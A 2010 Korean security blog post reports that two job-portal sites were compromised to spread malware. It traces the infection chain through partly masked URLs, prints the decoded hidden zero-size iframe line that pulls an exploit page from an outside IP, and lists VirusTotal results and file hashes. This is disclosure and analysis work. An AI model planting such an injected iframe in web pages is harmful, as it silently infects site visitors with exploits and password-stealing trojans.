본문 바로가기

security/악성코드 유포

[악성코드 유포] 알라딘 너희만 유포하냐?? 취업 , 포털 사이트인 우리도 질 수 없다.

세의님의 알라딘 시리즈에 이어서 이에 뒤질세라 평일에 포털사이트인 캐리어도 유포를 시작하였습니다.현재 페이지는 오늘 오후에 변조가 되었음을 확인하였습니다. 그 결과 http://job.XXXX.net 에도 악성링크가 삽입되어서 현재는 취업 사이트인 캐리어와 잡 NEXT에서 유포 되고 있음을 확인 할 수 있습니다 !!

지난주에도 글을 쓸까 말까 하다가 이번에 다시 유포되고 있어서 이렇게 글을 써봅니다. 아무튼 이 사이트 둘은 매우 조심해야 아니 들어가지 말아야합니다 !! 악성코드는 캐리어와 NEXT음에서 유포하고 있습니다. 현재 원인으로써는 먼저 감염된 커리어에 있는거 같습니다. 커리어 http://www.caxxxx.co.kr/js/job_rnd_list.js 에서 job.XXXX.net 으로 유입된거 같습니다.
어쨌든 캐리어는 메인사이트에 들어가는 동시에 JOB NEXT음 은 JOB에 들어가는 동시에 감염이 되는거 같습니다.

[정리]

최초 유포지 : http://www.caxxxx.co.kr/
2차 유포지 : http://job.xxxx.net 
악성코드 아이프레임 삽입 : http://xxxx.xxxx.net/xx/jquery.min.js 
악성코드 연결 JS : http://2xx.143.48.xxx/xx/si.js 
최종파일 연결 : http://2xx.143.48.xxx/xx/si.asp
최종파일 : http://www.sixxx.or.kr/xxot/txxx/down.exe

그중 si.js는 출력에만 접근한다면 쉽게 asp가 나올 수 있습니다.

출력 : document.write("<iframe src= http://2xx.143.48.xxx/xx/si.asp width=0 height=0></iframe>");

[바이러스 토탈]

File name:

si.js

Result:
6/ 43 (14.0%)

Antivirus Version Last update Result
AhnLab-V3 2010.10.01.00 2010.09.30 JS/Downloader
AntiVir 7.10.12.92 2010.09.30 -
Antiy-AVL 2.0.3.7 2010.09.30 -
Authentium 5.2.0.5 2010.09.30 -
Avast 4.8.1351.0 2010.09.30 HTML:IFrame-JK
Avast5 5.0.594.0 2010.09.30 HTML:IFrame-JK
AVG 9.0.0.851 2010.09.30 -
BitDefender 7.2 2010.09.30 -
CAT-QuickHeal 11.00 2010.09.30 -
ClamAV 0.96.2.0-git 2010.10.01 -
Comodo 6248 2010.10.01 -
DrWeb 5.0.2.03300 2010.10.01 -
Emsisoft 5.0.0.50 2010.09.30 -
eSafe 7.0.17.0 2010.09.30 -
eTrust-Vet 36.1.7885 2010.09.30 -
F-Prot 4.6.2.117 2010.09.30 -
F-Secure 9.0.15370.0 2010.10.01 -
Fortinet 4.1.143.0 2010.09.30 -
GData 21 2010.10.01 HTML:IFrame-JK
Ikarus T3.1.1.90.0 2010.09.30 -
Jiangmin 13.0.900 2010.09.30 -
K7AntiVirus 9.63.2648 2010.09.30 -
Kaspersky 7.0.0.125 2010.10.01 -
McAfee 5.400.0.1158 2010.10.01 -
McAfee-GW-Edition 2010.1C 2010.09.30 Heuristic.LooksLike.JS.Suspicious.B
Microsoft 1.6201 2010.09.30 -
NOD32 5493 2010.09.30 -
Norman 6.06.07 2010.09.30 -
nProtect 2010-09-30.01 2010.09.30 -
Panda 10.0.2.7 2010.09.30 -
PCTools 7.0.3.5 2010.10.01 -
Prevx 3.0 2010.10.01 -
Rising 22.67.02.07 2010.09.30 -
Sophos 4.58.0 2010.10.01 Mal/Iframe-Gen
Sunbelt 6952 2010.09.30 -
SUPERAntiSpyware 4.40.0.1006 2010.10.01 -
Symantec 20101.2.0.161 2010.09.30 -
TheHacker 6.7.0.1.041 2010.09.30 -
TrendMicro 9.120.0.1004 2010.09.30 -
TrendMicro-HouseCall 9.120.0.1004 2010.10.01 -
VBA32 3.12.14.1 2010.09.27 -
ViRobot 2010.8.31.4017 2010.09.30 -
VirusBuster 12.66.8.0 2010.09.30 -
MD5: 82360d68e71cf37ae4400295f1746f08
SHA1: f67661ca29e253fde9bfda1ab5e0f54a0ddbf9dc
SHA256: 0536c42b0bbcbc8a4db28fe2f0931eee93bda5b1c8586682293e1a8664fc61de
File size: 424 bytes
Scan date: 2010-10-01 00:13:28 (UTC)

File name:
si.asp
Result:
6/ 43 (14.0%)

Antivirus Version Last update Result
AhnLab-V3 2010.10.01.00 2010.09.30 JS/Cve-2010-0806
AntiVir 7.10.12.92 2010.09.30 JS/Small.R
Antiy-AVL 2.0.3.7 2010.09.30 -
Authentium 5.2.0.5 2010.09.30 -
Avast 4.8.1351.0 2010.09.30 JS:Downloader-RN
Avast5 5.0.594.0 2010.09.30 JS:Downloader-RN
AVG 9.0.0.851 2010.09.30 -
BitDefender 7.2 2010.09.30 -
CAT-QuickHeal 11.00 2010.09.30 -
ClamAV 0.96.2.0-git 2010.10.01 -
Comodo 6248 2010.10.01 -
DrWeb 5.0.2.03300 2010.10.01 -
Emsisoft 5.0.0.50 2010.09.30 -
eSafe 7.0.17.0 2010.09.30 -
eTrust-Vet 36.1.7885 2010.09.30 -
F-Prot 4.6.2.117 2010.09.30 JS/Crypted.GA.gen
F-Secure 9.0.15370.0 2010.10.01 -
Fortinet 4.1.143.0 2010.09.30 -
GData 21 2010.10.01 JS:Downloader-RN
Ikarus T3.1.1.90.0 2010.09.30 -
Jiangmin 13.0.900 2010.09.30 -
K7AntiVirus 9.63.2648 2010.09.30 Riskware
Kaspersky 7.0.0.125 2010.10.01 Exploit.JS.CVE-2010-0806.z
McAfee 5.400.0.1158 2010.10.01 -
McAfee-GW-Edition 2010.1C 2010.09.30 Heuristic.BehavesLike.JS.BufferOverflow.A
Microsoft 1.6201 2010.09.30 -
NOD32 5493 2010.09.30 -
Norman 6.06.07 2010.09.30 -
nProtect 2010-09-30.01 2010.09.30 Script-JS/W32.Agent.AEQ
Panda 10.0.2.7 2010.09.30 -
PCTools 7.0.3.5 2010.10.01 -
Prevx 3.0 2010.10.01 -
Rising 22.67.02.07 2010.09.30 Trojan.DL.Script.JS.Agent.qx
Sophos 4.58.0 2010.10.01 Mal/JSBO-Gen
Sunbelt 6952 2010.09.30 -
SUPERAntiSpyware 4.40.0.1006 2010.10.01 -
Symantec 20101.2.0.161 2010.09.30 -
TheHacker 6.7.0.1.041 2010.09.30 -
TrendMicro 9.120.0.1004 2010.09.30 -
TrendMicro-HouseCall 9.120.0.1004 2010.10.01 -
VBA32 3.12.14.1 2010.09.27 -
ViRobot 2010.8.31.4017 2010.09.30 JS.EX-CVE-2010-0806.5882.B
VirusBuster 12.66.8.0 2010.09.30 -
MD5: 5d9c846e08a768f648080e5d207aeb47
SHA1: f24d4dba37fd16eba993f337dbf357fca94dc533
SHA256: d795c3be4ec899f70b4b6c6c5e6900ef0537001072b92a304319c6f314d09034
File size: 6015 bytes
Scan date: 2010-10-01 00:13:31 (UTC)


File name:
down.exe
Result:
30/ 43 (69.8%)

Antivirus Version Last update Result
AhnLab-V3 2010.10.01.00 2010.09.30 Win-Trojan/Agent.54272.NF
AntiVir 7.10.12.92 2010.09.30 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.09.30 -
Authentium 5.2.0.5 2010.09.30 -
Avast 4.8.1351.0 2010.09.30 Win32:Malware-gen
Avast5 5.0.594.0 2010.09.30 Win32:Malware-gen
AVG 9.0.0.851 2010.09.30 PSW.Generic8.VIP
BitDefender 7.2 2010.09.30 Gen:Trojan.Heur.Zbot.dmW@cevx5Cj
CAT-QuickHeal 11.00 2010.09.30 (Suspicious) - DNAScan
ClamAV 0.96.2.0-git 2010.10.01 -
Comodo 6248 2010.10.01 -
DrWeb 5.0.2.03300 2010.10.01 Trojan.PWS.Siggen.8181
Emsisoft 5.0.0.50 2010.09.30 Trojan.Win32.Pincav!IK
eSafe 7.0.17.0 2010.09.30 -
eTrust-Vet 36.1.7886 2010.10.01 -
F-Prot 4.6.2.117 2010.09.30 -
F-Secure 9.0.15370.0 2010.10.01 Gen:Trojan.Heur.Zbot.dmW@cevx5Cj
Fortinet 4.1.143.0 2010.09.30 -
GData 21 2010.10.01 Gen:Trojan.Heur.Zbot.dmW@cevx5Cj
Ikarus T3.1.1.90.0 2010.09.30 Trojan.Win32.Pincav
Jiangmin 13.0.900 2010.09.30 Trojan/Invader.add
K7AntiVirus 9.63.2648 2010.09.30 Trojan
Kaspersky 7.0.0.125 2010.10.01 Trojan.Win32.Pincav.ahzv
McAfee 5.400.0.1158 2010.10.01 Generic.dx!tzh
McAfee-GW-Edition 2010.1C 2010.09.30 Generic.dx!tzh
Microsoft 1.6201 2010.09.30 PWS:Win32/Magania.BQ
NOD32 5493 2010.09.30 a variant of Win32/PSW.Gamania.NBT
Norman 6.06.07 2010.09.30 -
nProtect 2010-09-30.01 2010.09.30 -
Panda 10.0.2.7 2010.09.30 Generic Trojan
PCTools 7.0.3.5 2010.10.01 Trojan-PSW.Gampass
Prevx 3.0 2010.10.01 High Risk Cloaked Malware
Rising 22.67.02.07 2010.09.30 -
Sophos 4.58.0 2010.10.01 Mal/Dorf-F
Sunbelt 6952 2010.09.30 Trojan.Win32.Generic!BT
SUPERAntiSpyware 4.40.0.1006 2010.10.01 -
Symantec 20101.2.0.161 2010.09.30 Infostealer.Gampass
TheHacker 6.7.0.1.041 2010.09.30 Trojan/Pincav.ahzv
TrendMicro 9.120.0.1004 2010.09.30 TROJ_PINCAV.SMXA
TrendMicro-HouseCall 9.120.0.1004 2010.10.01 TROJ_PINCAV.SMXA
VBA32 3.12.14.1 2010.09.27 Malware-Cryptor.Inject.gen
ViRobot 2010.8.31.4017 2010.09.30 -
VirusBuster 12.66.8.0 2010.09.30 Trojan.Pincav.IVM
MD5: 18d7b00b5d37587c7456b3c3a1181a69
SHA1: fcb91ed3d3b5e498bf3b4ce508351f3e3c51dab5
SHA256: 960af5ab7b18c06b4e4bb0580265585df20510f025b89300e7f364e800cbfa83
File size: 54272 bytes
Scan date: 2010-10-01 00:19:25 (UTC)

신고업체 : 안철수연구소 이스트 소프트 , 네이버 , 잉카인터넷 

[안철수연구소]

1 si.js ~> V3 : JS/Downloader(추가 : 2010.10.01.00) 
2 down.exe ~> V3 : Win-Trojan/Agent.54272.NF(추가 : 2010.10.01.00) 
3 si.asp ~> V3 : JS/Cve-2010-0806(추가 : 2010.10.01.00)

이전 게시글

[security/보안 뉴스] - [카스퍼스키] 2010년 8월 악성 프로그램 통계
[security/악성코드 유포] - yahoo.js 의 유포날짜 2차 정리 !!
[security/악성코드 유포] - 아스키 코드로 이루어진 악성 아이프레임 !!